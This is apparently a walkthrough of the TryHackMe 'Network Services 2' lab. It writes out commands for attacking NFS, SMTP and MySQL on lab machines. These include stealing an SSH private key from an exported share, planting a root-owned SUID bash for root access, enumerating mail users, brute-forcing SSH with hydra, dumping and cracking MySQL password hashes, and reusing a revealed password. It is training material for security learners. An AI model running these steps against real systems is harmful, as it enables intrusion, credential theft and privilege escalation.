TryHackMe - Network Services 2 - Walkthrough

TryHackMe - Network Services 2 - Walkthrough

Introduction

Today we're going to be doing a walkthrough for the Network Services 2 room hosted at https://tryhackme.com/room/networkservices2 . For this walkthrough, we'll be using two virtual machines (VMs), a Kali Linux VM as our attacking machine, and the deployed vulnerable VM clients as the the victim machines.

Task 1 - Get Connected

Questions:

Ready? Let's get going!

No answer needed

Task 2 - Understanding NFS

Questions

What does NFS stand for?

Answer contained within Task description

What process allows an NFS client to interact with a remote directory as though it was a physical device?

Answer contained within Task description, but the answer includes the suffix “ing”.

What does NFS use to represent files and directories on the server?

Answer contained within Task description

What protocol does NFS use to communicate between the server and client?

Answer contained within Task description

What two pieces of user data does the NFS server take as parameters for controlling user permissions? Format: parameter 1 / parameter 2

Answer contained within Task description

Can a Windows NFS server share files with a Linux client? (Y/N)

Answer contained within Task description

Can a Linux NFS server share files with a MacOS client? (Y/N)

Answer contained within Task description

What is the latest version of NFS? [released in 2016, but is still up to date as of 2020] This will require external research.

Google search term = network file system version 2016

Task 3 - Enumerating NFS

Questions

Conduct a thorough port scan scan of your choosing, how many ports are open?

nmap -p- -T4 10.10.108.14

Which port contains the service we're looking to enumerate?

nmap -p- -T4 10.10.108.14 | grep -i nfs

Now, use /usr/sbin/showmount -e [IP] to list the NFS shares, what is the name of the visible share?

showmount -e 10.10.108.14

Time to mount the share to our local machine!

First, use "mkdir /tmp/mount" to create a directory on your machine to mount the share to. This is in the /tmp directory- so be aware that it will be removed on restart.

Then, use the mount command we broke down earlier to mount the NFS share to your local machine. Change directory to where you mounted the share- what is the name of the folder inside?

sudo mkdir /tmp/mount
sudo mount -t nfs 10.10.108.14:home /tmp/mount/ -nolock
ls /tmp/mount

Have a look inside this directory, look at the files. Looks like we're inside a user's home directory...

No answer needed

(unofficial)

cd /tmp/mount/cappucino
ls -la

Interesting! Let's do a bit of research now, have a look through the folders. Which of these folders could contain keys that would give us remote access to the server?

ls -la /tmp/mount/cappucino

Which of these keys is most useful to us?

ls /tmp/mount/cappucino/.ssh

Copy this file to a different location your local machine, and change the permissions to "600" using "chmod 600 [file]".

Assuming we were right about what type of directory this is, we can pretty easily work out the name of the user this key corresponds to.

Can we log into the machine using ssh -i <key-file> <username>@<ip> ? (Y/N)

cd /tmp
cp /tmp/mount/cappucino/.ssh/id_rsa /tmp/id_rsa
chmod 600 id_rsa
ssh -i id_rsa cappucino@10.10.108.14
yes

Task 4 - Exploiting NFS

Questions

First, change directory to the mount point on your machine, where the NFS share should still be mounted, and then into the user's home directory.

No answer needed

(unofficial)

exit
cd /tmp/mount/cappucino

Download the bash executable to your Downloads directory. Then use "cp ~/Downloads/bash ." to copy the bash executable to the NFS share. The copied bash shell must be owned by a root user, you can set this using "sudo chown root bash"

No answer needed

(unofficial)

cd /home/kali/Downloads
wget https://github.com/polo-sec/writing/blob/master/Security%20Challenge%20Walkthroughs/Networks%202/bash?raw=true
mv ‘bash?raw=true’ bash
sudo chown root bash

Now, we're going to add the SUID bit permission to the bash executable we just copied to the share using "sudo chmod +[permission] bash". What letter do we use to set the SUID bit set using chmod?

Answer contained within this webpage:
https://www.liquidweb.com/kb/how-do-i-set-up-setuid-setgid-and-sticky-bits-on-linux/

Let's do a sanity check, let's check the permissions of the "bash" executable using "ls -la bash". What does the permission set look like? Make sure that it ends with -sr-x.

cd /tmp/mount/cappucino
mv /home/kali/Downloads/bash bash
sudo chmod 2755 bash
sudo chmod u+s bash
ls -la bash

Now, SSH into the machine as the user. List the directory to make sure the bash executable is there. Now, the moment of truth. Lets run it with "./bash -p". The -p persists the permissions, so that it can run as root with SUID- as otherwise bash will sometimes drop the permissions.

ssh -i /tmp/id_rsa cappucino@10.10.108.14
./bash -p

Great! If all's gone well you should have a shell as root! What's the root flag?

cat /root/root.txt

Task 5 - Understanding SMTP

Questions

What does SMTP stand for?

Answer contained within Task description

What does SMTP handle the sending of?

Answer contained within Task description

What is the first step in the SMTP process?

Answer contained within Task description

What is the default SMTP port?

Google search term = SMTP port

Where does the SMTP server send the email if the recipient's server is not available?

Answer contained within Task description

On what server does the Email ultimately end up on?

Answer contained within Task description

Can a Linux machine run an SMTP server? (Y/N)

Answer contained within Task description

Can a Windows machine run an SMTP server? (Y/N)

Answer contained within Task description

Task 6 - Enumerating SMTP

Questions

First, lets run a port scan against the target machine, same as last time. What port is SMTP running on?

nmap 10.10.92.221

Okay, now we know what port we should be targeting, let's start up Metasploit. What command do we use to do this?

Answer available at the following link:
https://www.offensive-security.com/metasploit-unleashed/msfconsole/

Let's search for the module "smtp_version", what's it's full module name?

msfconsole
search “smtp_version”

Great, now- select the module and list the options. How do we do this?

Answer contained within Task description.

Have a look through the options, does everything seem correct? What is the option we need to set?

use auxiliary/scanner/smtp/smtp_version
options

Set that to the correct value for your target machine. Then run the exploit. What's the system mail name?

set rhosts 10.10.92.221
run

What Mail Transfer Agent (MTA) is running the SMTP server? This will require some external research.

nmap -p25 -sV 10.10.92.221

Good! We've now got a good amount of information on the target system to move onto the next stage. Let's search for the module "smtp_enum", what's it's full module name?

msfconsole
search “smtp_enum”

What option do we need to set to the wordlist's path?

use auxiliary/scanner/smtp/smtp_enum
options

Once we've set this option, what is the other essential paramater we need to set?

set USER_FILE /usr/share/seclists/Usernames/top-usernames-shortlist.txt
options

Now, run the exploit, this may take a few minutes, so grab a cup of tea, coffee, water. Keep yourself hydrated!

No answer needed

Okay! Now that's finished, what username is returned?

set rhosts 10.10.92.221
run

Task 7 - Exploiting SMTP

Questions

What is the password of the user we found during our enumeration stage?

hydra -t 16 -l administrator -P /usr/share/wordlists/rockyou.txt -vV 10.10.92.221 ssh

Great! Now, let's SSH into the server as the user, what is contents of smtp.txt

ssh administrator@10.10.92.221
yes
password: password found from previous task
cat smtp.txt

Task 8 - Understanding MySQL

Questions

What type of software is MySQL?

Answer contained wtihin Task description

What language is MySQL based on?

Answer contained within Task description

What communication model does MySQL use?

Answer contained within Task description

What is a common application of MySQL?

Answer contained within Task description

What major social network uses MySQL as their back-end database? This will require further research.

Google search term = mysql social network

Task 9 - Enumerating MySQL

Questions

As always, let's start out with a port scan, so we know what port the service we're trying to attack is running on. What port is MySQL using?

nmap -T4 10.10.116.113

Good, now- we think we have a set of credentials. Let's double check that by manually connecting to the MySQL server. We can do this using the command "mysql -h [IP] -u [username] -p"

No answer needed

(unofficial)

mysql -h 10.10.116.113 -u root -p
password: password

Okay, we know that our login credentials work. Lets quit out of this session with "exit" and launch up Metasploit.

No answer needed

(unofficial)

exit
msfconsole

We're going to be using the "mysql_sql" module.

Search for, select and list the options it needs. What three options do we need to set? (in descending order).

search “mysql_sql”
use auxiliary/admin/mysql/mysql_sql
options

Run the exploit. By default it will test with the "select version()" command, what result does this give you?

set password password
set rhosts 10.10.116.113
set username root
run

Great! We know that our exploit is landing as planned. Let's try to gain some more ambitious information. Change the "sql" option to "show databases". how many databases are returned?

set sql “show databases”
run

Task 10 - Exploiting MySQL

Questions

First, let's search for and select the "mysql_schemadump" module. What's the module's full name?

search “mysql_schemadump”

Great! Now, you've done this a few times by now so I'll let you take it from here. Set the relevant options, run the exploit. What's the name of the last table that gets dumped?

use auxiliary/scanner/mysql/mysql_schemadump
set password password
set rhosts 10.10.116.113
set username root
run

Awesome, you have now dumped the tables, and column names of the whole database. But we can do one better... search for and select the "mysql_hashdump" module. What's the module's full name?

search “mysql_hashdump”

Again, I'll let you take it from here. Set the relevant options, run the exploit. What non-default user stands out to you?

use auxiliary/scanner/mysql/mysql_hashdump
set password password
set rhosts 10.10.116.113
set username root
run

Another user! And we have their password hash. This could be very interesting. Copy the hash string in full, like: bob:*HASH to a text file on your local machine called "hash.txt".

What is the user/hash combination string?

echo “<username:passwordHash>” > hash.txt

Now, we need to crack the password! Let's try John the Ripper against it using: "john hash.txt" what is the password of the user we found?

/usr/sbin/john hash.txt

Awesome. Password reuse is not only extremely dangerous, but extremely common. What are the chances that this user has reused their password for a different service?

What's the contents of MySQL.txt

ssh carl@10.10.147.114
yes
password: doggie
cat MySQL.txt

Task 11 - Further Learning

Questions

Congratulations! You did it!

No answer needed

Finish

Comments